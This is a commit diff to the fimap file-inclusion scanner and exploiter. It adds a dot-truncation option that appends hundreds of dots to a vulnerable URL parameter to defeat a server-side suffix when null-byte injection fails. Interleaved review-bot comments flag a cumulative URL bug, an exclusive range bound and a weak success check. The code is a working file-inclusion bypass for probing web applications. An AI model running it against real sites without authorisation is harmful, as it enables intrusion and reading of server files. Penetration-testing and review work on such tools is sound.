Commit f2df44a1 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Added first code for dot truncation technique.

parent 2ad98e13
......@@ -57,9 +57,15 @@ def show_help(AndQuit=False):
print " -H , --harvest Mode to harvest a URL recursivly for new URLs."
print " Needs a root url (-u) to start crawling there."
print " Also needs (-w) to write a URL list for mass mode."
print "## Techniques:"
#dot-truncation
print " -b , --enable-blind Enables blind FI-Bug testing when no error messages are printed."
print " Note that this mode will cause lots of requests compared to the"
print " default method. Can be used with -s, -m or -g. Experimental."
print " -D , --dot-truncation Enables dot truncation technique to get rid of the suffix if"
print " the default mode (nullbyte poison) failed. This mode can cause"
print " tons of requests depending how you configure it."
print " Can be used with -s, -m or -g. Experimental."
print "## Variables:"
print " -u , --url=URL The URL you want to test."
print " Needed in single mode (-s)."
......@@ -195,6 +201,7 @@ if __name__ == "__main__":
config["p_maxtries"] = 5
config["p_skippages"] = 0
config["p_monkeymode"] = False
config["p_doDotTruncation"] = False
config["p_proxy"] = None
config["p_ttl"] = 30
config["p_post"] = ""
......@@ -223,8 +230,8 @@ if __name__ == "__main__":
"harvest" , "write=" , "depth=" , "greetings" , "test-rfi" , "skip-pages=",
"show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect",
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CI", longSwitches)
"googlesleep=" , "dot-truncation"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CID", longSwitches)
startExploiter = False
......@@ -267,6 +274,8 @@ if __name__ == "__main__":
doRFITest = True
if (k in ("-b", "--enable-blind")):
config["p_monkeymode"] = True
if (k in ("-D", "--dot-truncation")):
config["p_doDotTruncation"] = True
if (k in ("-C", "--enable-color")):
config["p_color"] = True
if (k in ("--skip-pages",)):
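Review bot: The new help text for `-D` in the show_help hunk says the number of requests depends on "how you configure it", but this commit adds no option for the dot range — `p_doDotTruncation` is the only new config key, and the range the scanner tries (700 to 800 in steps of 50) is hard-coded in the targetScanner hunk — so the sentence promises a knob the user does not have. Either reword that line to state the range is currently fixed, e.g. `... tons of requests (the dot range is currently fixed at 700-800)."`, or add a matching long option (e.g. `"dot-truncation-range="`) that writes the bounds into config. The bare `#dot-truncation` comment dropped between the print statements looks like a leftover placeholder and should be removed. While the getopt short-option string is being edited, note it still lists `s` twice (`msl:` and `sxH`); that predates this change but is worth tidying in the same line.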
......@@ -26,6 +26,8 @@ import re,os
import os.path
import posixpath
import ntpath
import difflib
import time
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$30.08.2009 19:59:44$"
......@@ -43,7 +45,7 @@ class targetScanner (baseClass.baseClass):
self._log("Parsing URL '%s'..."%(self.Target_URL), self.LOG_ALWAYS)
if (self.Target_URL.find("?") == -1):
if (self.Target_URL.count("?") == 0):
self._log("Target URL doesn't have any params.", self.LOG_DEBUG);
else:
data = self.Target_URL.split("?")[1]
......@@ -374,6 +376,46 @@ class targetScanner (baseClass.baseClass):
r.setSurfix("%00")
r.setNullBytePossible(True)
if (not r.NullbytePoison and self.config["p_doDotTruncation"]):
self._log("Trying Dot Truncation to get rid of the suffix...", self.LOG_INFO)
dot_trunc_start = 700
dot_trunc_end = 800
dot_trunc_step = 50
max_diff = 0.095
self._log("Preparing Dot Truncation comparation string...", self.LOG_DEBUG)
tmpurl = URL
code1 = self.doGetRequest(URL)
vulnParamBlock = "%s=%s%s"%(VulnParam, Params[VulnParam], r.getAppendix())
desturl = tmpurl.replace("%s=%s"%(VulnParam,Params[VulnParam]), vulnParamBlock)
self._log("Test URL will be: " + desturl, self.LOG_DEVEL)
success = False
seqmatcher = difflib.SequenceMatcher()
for i in range (dot_trunc_start, dot_trunc_end, dot_trunc_step):
tmpurl = desturl
desturl = desturl.replace(vulnParamBlock, "%s%s"%(vulnParamBlock, "." * i))
content = self.doGetRequest(desturl)
if (content == None):
self._log("Dot Truncation testing failed :(", self.LOG_WARN)
break
seqmatcher.set_seqs(code1, content)
ratio = seqmatcher.ratio()
if (1-max_diff <= ratio <= 1):
self._log("Dot Truncation successfull with: %d dots ; %f ratio)!" %(i, ratio), self.LOG_INFO)
r.setSurfix("." * i)
r.setNullBytePossible(True)
success = True
break
else:
self._log("No luck with (%s)..." %(i), self.LOG_DEBUG)
if (not success):
self._log("Dot Truncation not possible :(", self.LOG_INFO)
if (scriptpath == ""):
# Failed to get scriptpath with easy method :(
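Review bot: The probe URL is built cumulatively in the loop at `desturl = desturl.replace(vulnParamBlock, "%s%s"%(vulnParamBlock, "." * i))`: desturl is never restored from the base URL (the `tmpurl = desturl` assignment is never read back), so on the second iteration vulnParamBlock is replaced inside a string that already carries 700 dots and the request actually sends 700+750 dots, while the log message and `r.setSurfix("." * i)` record 750. Build each probe from the untouched base instead, `testurl = desturl.replace(vulnParamBlock, vulnParamBlock + "." * i)` followed by `content = self.doGetRequest(testurl)`, drop the unused `tmpurl`, and write `content is None` rather than `content == None`. Note also that `range(dot_trunc_start, dot_trunc_end, dot_trunc_step)` with 700/800/50 only tries 700 and 750, because the end bound is exclusive; if 800 is meant to be tested the loop should run to `dot_trunc_end + dot_trunc_step`. The success check compares the dotted response against `code1`, the response to the unmodified URL, so a target that renders the same page whether or not the include succeeds would satisfy the `1-max_diff <= ratio` threshold and be reported as vulnerable; a negative control (the appendix without dots, expected to differ from code1) would make the verdict more trustworthy. The enclosing method starts before this hunk and its remaining body continues after it.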